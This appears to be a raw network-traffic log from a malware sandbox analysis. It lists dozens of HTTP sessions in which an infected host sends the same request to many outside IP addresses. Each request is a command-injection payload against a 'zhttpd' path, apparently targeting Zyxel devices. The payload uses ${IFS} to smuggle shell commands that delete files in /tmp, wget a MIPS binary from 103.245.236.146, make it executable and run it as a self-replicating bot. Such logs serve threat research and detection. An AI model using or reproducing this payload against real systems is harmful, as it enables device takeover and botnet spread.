                                                Jan 29, 2024 07:07:51.410446882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5190192.168.2.2338458149.42.201.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.410484076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5191192.168.2.2347314189.208.113.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.410537004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5192192.168.2.233755083.204.119.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.410578012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5193192.168.2.235778891.225.36.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.410598993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5194192.168.2.235720450.98.60.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.410649061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5195192.168.2.234595258.240.78.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.410676003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5196192.168.2.2337598197.50.168.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.410737991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5197192.168.2.2347282222.199.186.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.410747051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5198192.168.2.233375489.97.23.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.410801888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5199192.168.2.234837418.239.24.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.410821915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5200192.168.2.2338418184.93.95.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.410868883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5201192.168.2.2352850119.11.196.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.410897017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5202192.168.2.234554064.155.174.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.410929918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5203192.168.2.2340934120.232.236.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.410959005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5204192.168.2.2352082146.55.252.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.411020041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5205192.168.2.2349352150.6.232.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.411055088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5206192.168.2.235383431.105.22.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.411088943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5207192.168.2.233577085.181.186.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.411124945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5208192.168.2.2353522170.234.218.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.411160946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5209192.168.2.234884689.187.27.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.411200047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5210192.168.2.2334080164.33.175.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.411228895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5211192.168.2.235519292.243.21.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.411278009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5212192.168.2.234845896.119.9.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.411318064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5213192.168.2.2338038147.129.162.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.411377907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5214192.168.2.235980892.234.35.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.411412954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5215192.168.2.2338456148.28.94.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.411434889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5216192.168.2.2343204119.41.7.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.411494017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5217192.168.2.2351954114.0.93.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.411526918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5218192.168.2.2343182130.230.201.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.411571980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5219192.168.2.2341252120.82.229.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.411597967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5220192.168.2.235350666.128.65.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.411633968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5221192.168.2.2338334219.50.214.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.411665916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5222192.168.2.23488769.39.27.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.411715031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5223192.168.2.233715614.55.76.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.411737919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5224192.168.2.234377813.82.164.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.411798000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5225192.168.2.2346580146.147.75.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.411834002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5226192.168.2.23390324.117.16.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.411921978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5227192.168.2.2355654106.225.21.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.411921978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5228192.168.2.23588509.81.209.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.411966085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5229192.168.2.2339482220.47.24.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.412005901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5230192.168.2.234265831.230.138.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.412051916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5231192.168.2.2333068209.179.81.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.412091017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5232192.168.2.234794663.9.97.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.412107944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5233192.168.2.234063642.205.151.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.412136078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5234192.168.2.2336680213.83.139.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.412195921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5235192.168.2.235609299.158.99.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.412226915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5236192.168.2.2337484106.143.137.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.412255049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5237192.168.2.2350834193.85.155.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.412306070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5238192.168.2.2360544175.103.94.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.412332058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5239192.168.2.235486058.223.237.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.412369967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5240192.168.2.2358554114.9.58.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.412432909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5241192.168.2.2341336154.18.135.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.412466049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5242192.168.2.2337304195.226.90.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.412503004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5243192.168.2.2358234111.0.207.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.412529945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5244192.168.2.2343256128.227.46.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.412591934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5245192.168.2.2332826205.46.11.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.412622929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5246192.168.2.234959664.9.25.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.412671089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5247192.168.2.235511039.56.194.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.412707090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5248192.168.2.233972288.211.79.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.412748098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5249192.168.2.234913073.222.150.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.412774086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5250192.168.2.234976451.201.100.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.412813902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5251192.168.2.2359850133.227.250.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.412838936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5252192.168.2.233737049.238.248.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.412873030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5253192.168.2.2348300132.46.70.125443
                                                TimestampBytes transferredDirectionData
